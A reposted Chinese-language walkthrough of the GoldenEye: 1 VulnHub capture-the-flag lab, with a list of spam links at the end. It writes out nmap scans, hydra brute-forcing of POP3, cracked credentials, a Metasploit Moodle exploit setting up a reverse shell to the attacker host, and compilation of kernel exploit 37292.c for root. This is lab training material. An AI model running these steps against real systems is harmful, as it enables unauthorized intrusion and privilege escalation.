当前位置: 首页 > wzjs >正文

上传文档网站开发关键字搜索网站怎么做

上传文档网站开发,关键字搜索网站怎么做,湘潭做网站 搜搜磐石网络,宁波网络推广平台GoldenEye: 1 来自 <GoldenEye: 1 ~ VulnHub> 1&#xff0c;将两台虚拟机网络连接都改为NAT模式 2&#xff0c;攻击机上做namp局域网扫描发现靶机 nmap -sn 192.168.23.0/24 那么攻击机IP为192.168.23.182&#xff0c;靶场IP192.168.23.223 3&#xff0c;对靶机进行端口…

GoldenEye: 1

来自 <GoldenEye: 1 ~ VulnHub>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.182,靶场IP192.168.23.223

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.223

服务80端口开放的http服务

根据提示访问/sev-home/页面

结果立马弹出来一个登录弹窗

4,查看页面源代码

view-source:http://192.168.23.223/terminal.js

根据页面可以得到信息:

&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;
解密得到用户登录密码

用户名boris、natalya

密码:InvincibleHack3r

5,登录成功

GoldenEye (黄金眼)

GoldenEye 是一个绝密的苏联原始武器项目。既然您有访问权限,那么您肯定拥有绝密许可,并有资格成为经过认证的 GoldenEye 网络运营商 (GNO)

请向合格的 GNO 主管发送电子邮件,以接受在线 GoldenEye作员培训,成为 GoldenEye 系统的管理员

请记住,由于通过隐匿性实现安全性非常有效,因此我们将 pop3 服务配置为在非常高的非默认端口上运行

根据提示就能够推测pop服务运行在nmap扫描得到的55007端口上。并且查看页面源代码得到:

view-source:http://192.168.23.223/sev-home/

6,将两个用户名(boris,natalya)保存到文件user.txt中,使用hydra爆破这两个用户登录pop的密码

hydra命令参数

  • -s:指定端口
  • 192.168.23.223:ip地址不加参数 直接写
  • pop3:服务名字不加参数 直接写
  • -L:字典文件
  • -v:显示详细信息

hydra 192.168.23.223 -s 55007 pop3 -L user.txt -P /usr/share/wordlists/fasttrack.txt -v

成功破解出来账户密码

login: natalya   password: bird

login: boris   password: secret1!

用nc连接pop3服务,登录这两个账号查看邮箱里面的邮件信息

nc 192.168.23.223 55007

user natalya

pass bird

list

retr 1

user boris

pass secret1!

list

retr 1

得到提示如下:

  • 用户名 alec
  • 网站用户名密码(不是邮箱用户名密码) xenia/RCP90rulez!
  • 设置本机系统host文件添加一行内容为 192.168.23.223 severnaya-station.com

7,访问网站域名severnaya-station.com。

Loading...

Loading... 在这个页面尝试登录

账户密码就用此前收集到的,登录成功

在My profile——Messages——选择Recent conversations看到一个doak发来的消息,得到新的邮箱用户名doak

得到的信息,然后使用hydra爆破出来用户登录账户密码

  • 邮件用户名:doak
  • cms版本:moodle 2.2.3

hydra 192.168.23.223 -s 55007 pop3 -l doak -P /usr/share/wordlists/fasttrack.txt -v

再次登录邮件服务器查看信息

得到用户名密码dr_doak/4England!

8,登录这个用户

在"Home"-->"My profile"-->"My private files"找到了s3cret.txt

得到重要提示

007,

我能够通过明文 txt 捕获此应用程序 adm1n cr3ds。

GoldenEye 服务器中大多数 Web 应用程序中的文本都会被扫描,因此我无法在此处添加 cr3dentials。

这里有一些有趣的东西:/dir007key/for-007.jpg

另外,您可能知道,RCP-90 远优于任何其他武器,而 License to Kill 是唯一的游戏方式。

9,尝试下载/dir007key/for-007.jpg图片并分析

wget http://severnaya-station.com/dir007key/for-007.jpg

strings for-007.jpg

得到eFdpbnRlcjE5OTV4IQ==

base64解密得到xWinter1995x! 猜测是admin的密码了

10,然后再在网站登录admin用户

whatweb -v Loading...

检索moodle这个框架的版本漏洞

searchsploit moodle 2

漏洞攻击前需要在设置中修改: Home ——Site administration——Plugins——Text editors——TinyMCE HTML editor 来到此处,修改PSpellShell然后save!否则会失败

11,启动melasploit

msfconsole                       

search moodle                   

use 1                      

set username admin               

set password xWinter1995x!      

set rhost severnaya-station.com  

set targeturi /gnocertdir        

set payload cmd/unix/reverse    

set lhost 192.168.23.182    

exploit 

成功getshell打进服务器网站,然后python启动一个交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

12,查看内核版本,期望通过过低的内核版本来获取公开的exp以实现权限提升

searchsploit local privilege Escalation |grep "Kernel 3"

这里使用37292.c

searchsploit -m 37292.c

这个靶场在枚举信息知道:无法进行GCC编译,需要编译脚本的工具为cc

vim 37292.c   

第143行将gcc改为cc  

然后在本目录下开启http服务:python -m http.server

去往/tmp目录下下载脚本

wget http://192.168.23.182:8000/37292.c   

成功下载后执行cc编译:

cc -o exp 37292.c   

错误原因分析

1. unshare 函数报错

  • 错误信息:implicit declaration of function ‘unshare’
  • 原因:unshare 是Linux特有的系统调用,需要包含头文件 <sched.h>,并启用GNU扩展宏 _GNU_SOURCE。
  • 解决方案
    #define _GNU_SOURCE    // 启用GNU扩展(必须放在文件最顶部)
    #include <sched.h>     // 包含 unshare 和 clone 的声明

2. clone 函数报错

  • 错误信息:implicit declaration of function ‘clone’; did you mean ‘close’?
  • 原因:clone 函数同样依赖 <sched.h> 和 _GNU_SOURCE 宏。
  • 额外检查:clone 的函数签名是否正确?
    int clone(int (*fn)(void *), void *stack, int flags, void *arg, ...);

3. waitpid 和 wait 函数报错

  • 错误信息:implicit declaration of function ‘waitpid’ 和 implicit declaration of function ‘wait’
  • 原因:未包含进程等待相关头文件 <sys/wait.h>。
  • 解决方案
    #include <sys/wait.h>  // 提供 waitpid 和 wait 的声明

完整修复步骤

  1. 在代码最顶部添加宏定义
    #define _GNU_SOURCE    // 必须放在所有头文件包含之前
  2. 补充缺失的头文件
    #include <sched.h>
    #include <sys/wait.h>
  3. 检查函数参数(如clone):
    • 确保 clone 的第一个参数是函数指针,且函数签名匹配:
      int child_exec(void *arg);  // 子进程执行函数需定义为这种形式
  4. 编译命令
    • 添加 -Wall 和 -Wextra 显示详细警告:
      gcc -Wall -Wextra 37292.c -o output
    • 若涉及线程,可能需要链接 -lpthread。

cc -o exp 37292.c 

chmod +x exp       

./exp              

id                  

cat /root/.flag.txt

成功提权并且获取到flag


文章转载自:

http://NBBf75GE.ntqnt.cn
http://rAVBNm5M.ntqnt.cn
http://yPxluqTA.ntqnt.cn
http://VgSSNv3l.ntqnt.cn
http://OkMpf8qB.ntqnt.cn
http://isEzDsmD.ntqnt.cn
http://ibiVvrmX.ntqnt.cn
http://hubXl26f.ntqnt.cn
http://ZrYrk5I0.ntqnt.cn
http://uiYS0hsp.ntqnt.cn
http://SMdCiuWm.ntqnt.cn
http://04i4Uph2.ntqnt.cn
http://x3d4QP1A.ntqnt.cn
http://pIvev9vn.ntqnt.cn
http://IgHAqd8k.ntqnt.cn
http://622Zu8Ax.ntqnt.cn
http://sjHtpwoL.ntqnt.cn
http://813o6oWK.ntqnt.cn
http://FWzaK3gJ.ntqnt.cn
http://N1pVIyZD.ntqnt.cn
http://xaH3XMNF.ntqnt.cn
http://w7lXoC2R.ntqnt.cn
http://sZvGpohB.ntqnt.cn
http://Tek6NkLu.ntqnt.cn
http://eAhABgDH.ntqnt.cn
http://Ix3MjTMI.ntqnt.cn
http://Ly4WmnZx.ntqnt.cn
http://6HdKFMlK.ntqnt.cn
http://gE2NjhLe.ntqnt.cn
http://Se3kb2i8.ntqnt.cn
http://www.dtcms.com/wzjs/613612.html

相关文章:

  • 凡科建站提示网站建设中网站设计任务书
  • 一个网站多个域名备案吗大连网站建设怎么样
  • 网站建设与管理电子教程盐城网站建设厂商
  • 网站推广软文公司家政公司怎么注册
  • 开发一个网站需要几个人美橙建站怎么样
  • 湖南竞网做网站好吗北京网站建设天下公司
  • it产品网站建设方案19年做网站
  • 吉他谱网站如何建设重庆建设工程信息网项目经理积分
  • 福州学做网站做图标得英文网站
  • 企业网站必须备案吗网站维护要多久
  • 专业商城网站设计制作做系统网站提醒有风险
  • 哪些网站适合新手编程做项目wordpress 预缓存
  • 旅游景区网站开发的政策可行性织梦快速建站
  • 东台建设网站的公司深圳市市场监督管理局
  • 地宝网 网站建设正规的机械外包加工订单网
  • 如何做盗版小说网站seo软件下载
  • iis网站ip县 两学一做网站
  • 做网站麻烦不网站是否开启gzip
  • 天津网站优化公司推荐哪家网站访问流程设计
  • 莘县网站网站运营维护
  • 我想建网站找谁做网站创业需要注册公司吗
  • 十堰网站搜索优化价格全国工商企业信息查询网
  • 网站系统修改不了怎么回事陕西住建厅网站官网
  • 云上网站做等保网站开发简易软件
  • 商务网站底部设计青岛做外贸网站哪家好
  • 塘沽网站制作公司合肥城乡建设网站
  • a站app下载泰安市住房和城乡建设部网站
  • 一站式做网站哪家好站内seo怎么做
  • 超大免费网站空间图解asp.net网站开发实战
  • 合肥网站建设5k5西安未央区今天出啥事了